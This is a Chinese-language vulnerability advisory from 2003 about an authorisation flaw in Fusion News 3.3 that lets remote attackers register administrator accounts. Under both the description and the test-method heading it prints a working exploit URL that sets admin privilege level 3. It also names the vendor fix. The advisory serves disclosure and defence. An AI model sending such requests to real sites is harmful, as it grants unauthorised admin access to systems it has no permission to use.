发布日期：2003-08-18
更新日期：2003-08-22

受影响系统：

Fusionphp Fusen News 3.3

描述：

---

BUGTRAQ  ID: 8441

Fusion News是一款在线新闻发布系统。

Fusion News对增加帐户脚本的请求缺少充分访问和权限限制，远程攻击者可以利用这个漏洞随意增加用户，以管理员权限访问应用系统。

当增加帐户时，Fusion News 3.3没有执行任意登录检查和限制，允许攻击者通过提交URL增加帐户，下面的请求：

http://www.website.com/FusenNews/?
id=signup&username=DarkKnight&email=EMAIL@EMAIL.COM+&password=123456&icon=
&le=3

可以增加密码为"123456"的"DarkKnight"帐户，其权限为管理员权限。

<*来源：DarkKnight （mbuzz04@yahoo.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=106096376727495&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

DarkKnight （mbuzz04@yahoo.com）提供了如下测试方法：

http://www.website.com/FusenNews/?
id=signup&username=DarkKnight&email=EMAIL@EMAIL.COM+&password=123456&icon=
&le=3

建议：

---

厂商补丁：

Fusionphp
---------
在Fusion news 3.3已经修正此漏洞：

http://www.fusionphp.net/index.php?id=fnews/fn_features

浏览次数：2992
严重程度：0（网友投票）